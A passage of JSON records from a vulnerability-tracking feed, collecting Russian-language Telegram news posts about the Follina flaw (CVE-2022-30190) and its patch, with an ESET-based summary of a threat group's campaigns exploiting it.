\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0430\u0441\u044c \u043f\u0440\u0438 \u0430\u0442\u0430\u043a\u0430\u0445. \u042d\u043a\u0441\u043f\u0435\u0440\u0442\u044b \u0443\u0436\u0435 \u043f\u0440\u0438\u0432\u0435\u043b\u0438 \u043f\u0440\u0438\u043c\u0435\u0440 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0430, \u043f\u0440\u043e\u0430\u043d\u0430\u043b\u0438\u0437\u0438\u0440\u043e\u0432\u0430\u0432 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u0444\u0430\u0439\u043b Microsoft Word.\n\n\u0421 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u044d\u0442\u043e\u0439 \u043e\u0448\u0438\u0431\u043a\u0438 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u043c\u043e\u0436\u0435\u0442 \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0439 \u043a\u043e\u0434 \u0441 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u044f\u043c\u0438 \u0432\u044b\u0437\u044b\u0432\u0430\u044e\u0449\u0435\u0433\u043e \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f. \u0421\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0435\u043d\u043d\u043e, \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u0442 \u043a \u0441\u0438\u0441\u0442\u0435\u043c\u0435 \u043f\u0440\u0430\u043a\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u043f\u043e\u043b\u043d\u044b\u0439 \u0434\u043e\u0441\u0442\u0443\u043f.\n\n\ud83d\uddde \u0411\u043b\u043e\u0433 \u041a\u043e\u0434\u0435\u0431\u0430\u0439\n\n#microsoft #vulnerability", "creation_timestamp": "2022-05-31T12:49:38.000000Z"}, {"uuid": "0b46dfd9-20f9-4be2-bf74-98c0fa5dc50a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/codeby_sec/6083", "content": "\u200b\ud83e\udda0 Microsoft \u0438\u0441\u043f\u0440\u0430\u0432\u0438\u043b\u0430 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0443\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c Follina\n\nMicrosoft \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0430 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0432\u043c\u0435\u0441\u0442\u0435 \u0441 \u043d\u0430\u043a\u043e\u043f\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u043c\u0438 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435\u043c Windows \u0437\u0430 \u0438\u044e\u043d\u044c 2022 \u0433\u043e\u0434\u0430 \u0434\u043b\u044f \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044f \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043d\u0443\u043b\u0435\u0432\u043e\u0433\u043e \u0434\u043d\u044f. \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e\u0439 \u043a\u0430\u043a Follina. \u041e\u0448\u0438\u0431\u043a\u0430 \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0432 \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u044e\u0449\u0438\u0445\u0441\u044f \u0430\u0442\u0430\u043a\u0430\u0445.\n\n\u00abMicrosoft \u043d\u0430\u0441\u0442\u043e\u044f\u0442\u0435\u043b\u044c\u043d\u043e \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u0442 \u043a\u043b\u0438\u0435\u043d\u0442\u0430\u043c \u0443\u0441\u0442\u0430\u043d\u0430\u0432\u043b\u0438\u0432\u0430\u0442\u044c \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u0434\u043b\u044f \u043f\u043e\u043b\u043d\u043e\u0439 \u0437\u0430\u0449\u0438\u0442\u044b \u043e\u0442 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438. \u041a\u043b\u0438\u0435\u043d\u0442\u0430\u043c, \u0447\u044c\u0438 \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u043d\u0430\u0441\u0442\u0440\u043e\u0435\u043d\u044b \u043d\u0430 \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u0435 \u0430\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0445 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0439, \u043d\u0435 \u043d\u0443\u0436\u043d\u043e \u043f\u0440\u0435\u0434\u043f\u0440\u0438\u043d\u0438\u043c\u0430\u0442\u044c \u043d\u0438\u043a\u0430\u043a\u0438\u0445 \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0445 \u0434\u0435\u0439\u0441\u0442\u0432\u0438\u0439\u00bb, \u2014 \u0433\u043e\u0432\u043e\u0440\u0438\u0442\u0441\u044f \u0432 \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u0438 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438.\n\n\u041e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0435\u043c\u0430\u044f \u043a\u0430\u043a CVE-2022-30190, \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043e\u043f\u0438\u0441\u0430\u043d\u0430 \u043a\u0430\u043a \u043e\u0448\u0438\u0431\u043a\u0430 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u0434\u043e\u0432 Microsoft Windows Support Diagnotic Tool (MSDT), \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u0432\u0441\u0435 \u0432\u0435\u0440\u0441\u0438\u0438 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u044b, \u0432\u0441\u0451 \u0435\u0449\u0451 \u043f\u043e\u043b\u0443\u0447\u0430\u044e\u0449\u0438\u0435 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 (Windows 7+, Windows Server 2008+).\n\n\u0417\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0443\u0441\u043f\u0435\u0448\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 \u044d\u0442\u0443 \u043e\u0448\u0438\u0431\u043a\u0443 \u0432 \u0441\u0432\u043e\u0438\u0445 \u0446\u0435\u043b\u044f\u0445, \u043c\u043e\u0433\u0443\u0442 \u0431\u0435\u0437 \u0442\u0440\u0443\u0434\u0430 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0439 \u043a\u043e\u0434 \u0441 \u043f\u0440\u0430\u0432\u0430\u043c\u0438 \u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f. \u0422\u0430\u043a\u0436\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043c\u043e\u0436\u0435\u0442 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u0434\u043b\u044f \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0438 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c, \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u044f \u0434\u0430\u043d\u043d\u044b\u0445 \u0438 \u0434\u0430\u0436\u0435 \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044f \u043d\u043e\u0432\u044b\u0445 \u0443\u0447\u0451\u0442\u043d\u044b\u0445 \u0437\u0430\u043f\u0438\u0441\u0435\u0439.\n\n\u041c\u044b \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u043c \u0432\u0441\u0435\u043c \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0435 \u0441\u0438\u0441\u0442\u0435\u043c\u044b, \u043a\u0430\u043a \u043c\u043e\u0436\u043d\u043e \u0441\u043a\u043e\u0440\u0435\u0435 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c \u043d\u043e\u0432\u043e\u0435 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u043e\u0442 Microsoft.\n\n\ud83d\uddde \u0411\u043b\u043e\u0433 \u041a\u043e\u0434\u0435\u0431\u0430\u0439\n\n#microsoft #windows", "creation_timestamp": "2022-06-15T20:37:27.000000Z"}, {"uuid": "c1e21988-76a1-499d-9670-5b4c73e347f1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/codeby_sec/6037", "content": "\u200bCVE-2022-30190. \u0420\u0430\u0437\u0431\u043e\u0440 MSDT \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438\n\n\u041f\u0440\u0438\u0432\u0435\u0442\u0441\u0442\u0432\u0443\u044e, Codeby! \u0412 \u044d\u0442\u043e\u0439 \u0441\u0442\u0430\u0442\u044c\u0435 \u043c\u044b \u0440\u0430\u0437\u0431\u0435\u0440\u0435\u043c \u043a\u0430\u043a \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 CVE-2022-30190 \u0438 \u043d\u0430 \u043f\u0440\u0430\u043a\u0442\u0438\u043a\u0435 \u0438\u0441\u043f\u044b\u0442\u0430\u0435\u043c \u0434\u0430\u043d\u043d\u0443\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c. 27 \u043c\u0430\u044f \u043d\u0430 VirusTotal \u043f\u043e\u0441\u0442\u0443\u043f\u0438\u043b \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442 Microsoft Office \u0441\u043e \u0441\u0442\u0440\u0430\u043d\u043d\u044b\u043c \u0437\u043b\u043e\u0432\u0440\u0435\u0434\u043d\u044b\u043c \u043a\u043e\u0434\u043e\u043c, \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0431\u044b\u043b\u0430 \u043e\u043f\u043e\u0437\u043d\u0430\u043d\u0430 \u043a\u0430\u043a 0-day, \u0447\u0442\u043e \u0434\u0435\u043b\u0430\u043b\u043e \u0435\u0435 \u043e\u0441\u043e\u0431\u0435\u043d\u043d\u043e \u043e\u043f\u0430\u0441\u043d\u043e\u0439 \u0432 \u0430\u0442\u0430\u043a\u0430\u0445. \u0420\u0438\u0441\u043a \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u0442\u043e\u043b\u044c\u043a\u043e \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u044b \u0441\u043e \u0432\u043a\u043b\u044e\u0447\u0435\u043d\u043d\u044b\u043c \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u043e\u043c MSDT URI \u0438 \u0441 \u041e\u0421 Winows. \u0414\u043b\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0442\u0430\u043a-\u0436\u0435 \u043d\u0435 \u0442\u0440\u0435\u0431\u0443\u0435\u0442\u0441\u044f \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u043c\u0430\u043a\u0440\u043e\u0441\u043e\u0432, \u0447\u0442\u043e \u0434\u0435\u043b\u0430\u0435\u0442 \u0430\u0442\u0430\u043a\u0443 \u0435\u0449\u0435 \u043b\u0435\u0433\u0447\u0435, \u0432\u0441\u0435 \u0447\u0442\u043e \u0442\u0440\u0435\u0431\u0443\u0435\u0442\u0441\u044f \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0435\u043c\u0443 - \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0439 \u044e\u0440\u043b \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c MSDT URI \u0434\u043b\u044f \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f powershell \u043a\u043e\u043c\u0430\u043d\u0434.\n\n\ud83d\udccc \u0427\u0438\u0442\u0430\u0442\u044c \u0441\u0442\u0430\u0442\u044c\u044e\n\n#cve #rce #windows", "creation_timestamp": "2022-06-08T17:42:42.000000Z"}, {"uuid": "28125cf5-cb6f-43b9-9551-ccf6e688d0fe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/itsec_news/2680", "content": "\u200b\u26a1\ufe0f\u0425\u0430\u043a\u0435\u0440\u0441\u043a\u0430\u044f \u0433\u0440\u0443\u043f\u043f\u0430 Asylum Ambuscade \u0443\u0441\u043f\u0435\u0448\u043d\u043e \u0441\u043e\u0447\u0435\u0442\u0430\u0435\u0442 \u0444\u0438\u043d\u0430\u043d\u0441\u043e\u0432\u0443\u044e \u043c\u043e\u0442\u0438\u0432\u0430\u0446\u0438\u044e \u0441 \u043a\u0438\u0431\u0435\u0440\u0448\u043f\u0438\u043e\u043d\u0430\u0436\u0435\u043c.\n\n\ud83d\udcac \u0413\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0430 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u043e\u0432, \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u0430\u044f \u043a\u0430\u043a Asylum Ambuscade, \u0437\u0430\u043d\u0438\u043c\u0430\u0435\u0442\u0441\u044f \u043a\u0438\u0431\u0435\u0440\u0448\u043f\u0438\u043e\u043d\u0430\u0436\u0435\u043c \u0438 \u043a\u0438\u0431\u0435\u0440\u043f\u0440\u0435\u0441\u0442\u0443\u043f\u043d\u043e\u0441\u0442\u044c\u044e, \u0430\u0442\u0430\u043a\u0443\u044f \u043c\u0430\u043b\u044b\u0435 \u0438 \u0441\u0440\u0435\u0434\u043d\u0438\u0435 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 \u043f\u043e \u0432\u0441\u0435\u043c\u0443 \u043c\u0438\u0440\u0443. \u042d\u0442\u0430 \u0433\u0440\u0443\u043f\u043f\u0430 \u0434\u0435\u0439\u0441\u0442\u0432\u0443\u0435\u0442 \u0441 2020 \u0433\u043e\u0434\u0430 \u0438 \u0431\u044b\u043b\u0430 \u0432\u043f\u0435\u0440\u0432\u044b\u0435 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0435\u0439 Proofpoint \u0432 \u043c\u0430\u0440\u0442\u0435 2022 \u0433\u043e\u0434\u0430.\n\n\u041f\u043e \u043d\u043e\u0432\u044b\u043c \u0434\u0430\u043d\u043d\u044b\u043c ESET, \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0430 Asylum Ambuscade \u0432 \u0441\u0432\u043e\u0438\u0445 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0445 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u044f\u0445 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0437\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0435 \u0444\u0438\u0448\u0438\u043d\u0433\u043e\u0432\u044b\u0435 \u043f\u0438\u0441\u044c\u043c\u0430 \u0441 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u043c\u0438 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0438, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u044e\u0442 \u0437\u043b\u043e\u0432\u0440\u0435\u0434\u043d\u044b\u0439 VBScript-\u043a\u043e\u0434 \u0438 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442 \u0434\u043b\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 CVE-2022-30190 . \u042d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u043f\u0440\u0438\u0432\u043e\u0434\u0438\u0442 \u043a \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0435 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0439 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u044b Sunseed, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u0435\u0442 \u0432\u0442\u043e\u0440\u0438\u0447\u043d\u044b\u0439 \u043c\u043e\u0434\u0443\u043b\u044c Akhbot \u0441 C2-\u0441\u0435\u0440\u0432\u0435\u0440\u0430 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u043e\u0432.\n\n\u0412 2023 \u0433\u043e\u0434\u0443 Asylum Ambuscade \u0440\u0430\u0441\u0448\u0438\u0440\u0438\u043b\u0430 \u0441\u0432\u043e\u044e \u0446\u0435\u043b\u0435\u0432\u0443\u044e \u0430\u0443\u0434\u0438\u0442\u043e\u0440\u0438\u044e, \u0430\u0442\u0430\u043a\u0443\u044f \u043a\u043b\u0438\u0435\u043d\u0442\u043e\u0432 \u0431\u0430\u043d\u043a\u043e\u0432, \u0442\u0440\u0435\u0439\u0434\u0435\u0440\u043e\u0432 \u043a\u0440\u0438\u043f\u0442\u043e\u0432\u0430\u043b\u044e\u0442, \u043f\u0440\u0430\u0432\u0438\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u0435 \u043e\u0440\u0433\u0430\u043d\u044b \u0438 \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u0435 \u043c\u0430\u043b\u044b\u0435 \u0438 \u0441\u0440\u0435\u0434\u043d\u0438\u0435 \u0431\u0438\u0437\u043d\u0435\u0441\u044b \u0432 \u0421\u0435\u0432\u0435\u0440\u043d\u043e\u0439 \u0410\u043c\u0435\u0440\u0438\u043a\u0435, \u0415\u0432\u0440\u043e\u043f\u0435 \u0438 \u0426\u0435\u043d\u0442\u0440\u0430\u043b\u044c\u043d\u043e\u0439 \u0410\u0437\u0438\u0438.\n\nESET \u043e\u0442\u043c\u0435\u0447\u0430\u0435\u0442, \u0447\u0442\u043e \u0445\u0430\u043a\u0435\u0440\u044b \u0442\u0430\u043a\u0436\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 \u043d\u043e\u0432\u044b\u0435 \u0432\u0435\u043a\u0442\u043e\u0440\u044b \u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0430\u0446\u0438\u0438, \u0432\u043a\u043b\u044e\u0447\u0430\u044f \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u0443\u044e \u0440\u0435\u043a\u043b\u0430\u043c\u0443 Google, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043f\u0435\u0440\u0435\u043d\u0430\u043f\u0440\u0430\u0432\u043b\u044f\u0435\u0442 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u043d\u0430 \u0441\u0430\u0439\u0442\u044b \u0441 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u043c JavaScript-\u043a\u043e\u0434\u043e\u043c. \u041a\u0440\u043e\u043c\u0435 \u0442\u043e\u0433\u043e, \u0441 \u043c\u0430\u0440\u0442\u0430 2023 \u0433\u043e\u0434\u0430 \u0445\u0430\u043a\u0435\u0440\u044b \u043d\u0430\u0447\u0430\u043b\u0438 \u043f\u0440\u0438\u043c\u0435\u043d\u044f\u0442\u044c \u043d\u043e\u0432\u044b\u0439 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442 Nodebot, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043f\u043e\u0440\u0442\u043e\u043c Ahkbot \u043d\u0430 Node.js.\n\n\u0412\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u0430\u044f \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0430 \u043c\u043e\u0436\u0435\u0442 \u0434\u0435\u043b\u0430\u0442\u044c \u0441\u043a\u0440\u0438\u043d\u0448\u043e\u0442\u044b, \u0432\u044b\u0442\u0430\u0441\u043a\u0438\u0432\u0430\u0442\u044c \u043f\u0430\u0440\u043e\u043b\u0438 \u0438\u0437 \u0431\u0440\u0430\u0443\u0437\u0435\u0440\u043e\u0432 Internet Explorer, Firefox \u0438 Chromium, \u0430 \u0442\u0430\u043a\u0436\u0435 \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u0442\u044c \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0435 \u043f\u043b\u0430\u0433\u0438\u043d\u044b AutoHotkey \u043d\u0430 \u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u043e\u0435 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u043e. \u042d\u0442\u0438 \u043f\u043b\u0430\u0433\u0438\u043d\u044b \u0438\u043c\u0435\u044e\u0442 \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u0443\u044e \u0444\u0443\u043d\u043a\u0446\u0438\u043e\u043d\u0430\u043b\u044c\u043d\u043e\u0441\u0442\u044c, \u0442\u0430\u043a\u0443\u044e \u043a\u0430\u043a \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0430 Cobalt Strike, \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0430 Chrome \u0434\u043b\u044f hVNC, \u0437\u0430\u043f\u0443\u0441\u043a \u043a\u0435\u0439\u043b\u043e\u0433\u0433\u0435\u0440\u0430, \u0440\u0430\u0437\u0432\u0451\u0440\u0442\u044b\u0432\u0430\u043d\u0438\u0435 \u0438\u043d\u0444\u043e\u0441\u0442\u0438\u043b\u0435\u0440\u0430 Rhadamanthys, \u0437\u0430\u043f\u0443\u0441\u043a \u043a\u043e\u043c\u043c\u0435\u0440\u0447\u0435\u0441\u043a\u0438 \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u043e\u0433\u043e RAT \u0438 \u0434\u0440\u0443\u0433\u043e\u0435.\n\n\u041f\u043e \u043e\u0446\u0435\u043d\u043a\u0430\u043c ESET, Asylum Ambuscade \u0437\u0430\u0440\u0430\u0437\u0438\u043b\u0430 \u043e\u043a\u043e\u043b\u043e 4500 \u0436\u0435\u0440\u0442\u0432 \u0441 \u044f\u043d\u0432\u0430\u0440\u044f 2022 \u0433\u043e\u0434\u0430, \u0447\u0442\u043e \u0441\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u043f\u0440\u0438\u043c\u0435\u0440\u043d\u043e 265 \u0436\u0435\u0440\u0442\u0432 \u0432 \u043c\u0435\u0441\u044f\u0446. \u042d\u0442\u043e \u0434\u0435\u043b\u0430\u0435\u0442 \u0434\u0430\u043d\u043d\u0443\u044e \u0433\u0440\u0443\u043f\u043f\u0443 \u0432\u0435\u0441\u044c\u043c\u0430 \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u043e\u0439 \u0443\u0433\u0440\u043e\u0437\u043e\u0439 \u0434\u043b\u044f \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0439 \u043f\u043e \u0432\u0441\u0435\u043c\u0443 \u043c\u0438\u0440\u0443.\n\n\u0426\u0435\u043b\u0438 \u0438 \u043c\u043e\u0442\u0438\u0432\u044b Asylum Ambuscade \u043f\u043e\u043a\u0430 \u043e\u0441\u0442\u0430\u044e\u0442\u0441\u044f \u043d\u0435\u044f\u0441\u043d\u044b\u043c\u0438. \u0425\u043e\u0442\u044f \u0445\u0430\u043a\u0435\u0440\u044b \u044f\u0432\u043d\u043e \u043d\u0430\u0446\u0435\u043b\u0435\u043d\u044b \u043d\u0430 \u043a\u0440\u0438\u043f\u0442\u043e\u0432\u0430\u043b\u044e\u0442\u044b \u0438 \u0431\u0430\u043d\u043a\u043e\u0432\u0441\u043a\u0438\u0435 \u0441\u0447\u0435\u0442\u0430 \u0434\u043b\u044f \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u043f\u0440\u0438\u0431\u044b\u043b\u0438, \u0437\u0430\u0440\u0430\u0436\u0435\u043d\u0438\u0435 SMB-\u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0439 \u043c\u043e\u0436\u0435\u0442 \u0442\u0430\u043a\u0436\u0435 \u0443\u043a\u0430\u0437\u044b\u0432\u0430\u0442\u044c \u043d\u0430 \u043a\u0438\u0431\u0435\u0440\u0448\u043f\u0438\u043e\u043d\u0430\u0436.\n\n\u0412\u043e\u0437\u043c\u043e\u0436\u043d\u043e, \u0445\u0430\u043a\u0435\u0440\u044b \u043f\u0440\u043e\u0434\u0430\u044e\u0442 \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u0441\u0435\u0442\u044f\u043c \u044d\u0442\u0438\u0445 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0439 \u0434\u0440\u0443\u0433\u0438\u043c \u043a\u0438\u0431\u0435\u0440\u043f\u0440\u0435\u0441\u0442\u0443\u043f\u043d\u0438\u043a\u0430\u043c \u0434\u043b\u044f \u0432\u043d\u0435\u0434\u0440\u0435\u043d\u0438\u044f, \u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, \u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u043e\u0433\u043e \u0441\u043e\u0444\u0442\u0430, \u043e\u0434\u043d\u0430\u043a\u043e ESET \u043d\u0435 \u043d\u0430\u0448\u043b\u0430 \u043d\u0438\u043a\u0430\u043a\u0438\u0445 \u0434\u043e\u043a\u0430\u0437\u0430\u0442\u0435\u043b\u044c\u0441\u0442\u0432 \u044d\u0442\u043e\u0439 \u0433\u0438\u043f\u043e\u0442\u0435\u0437\u044b.\n\n\ud83d\udd14 ITsec NEWS", "creation_timestamp": "2023-06-10T07:56:00.000000Z"}, {"uuid": "0901c9ec-e50e-4fb8-96c5-051729927a35", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "Telegram/HXnB78LZ993EnbGXdL2hofKwYDoKHSeDPKMDrtCNi3QDgzw", "content": "", "creation_timestamp": "2025-08-14T09:00:04.000000Z"}, {"uuid": "3c1cde3b-0369-456e-97a5-778c2b490edc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/malwarehunters/524", "content": "\u2757\ufe0f\u0412 2022 \u0433. \u0442\u0440\u043e\u044f\u043d WoodyRAT \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u044f\u043b\u0441\u044f \u0447\u0435\u0440\u0435\u0437 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 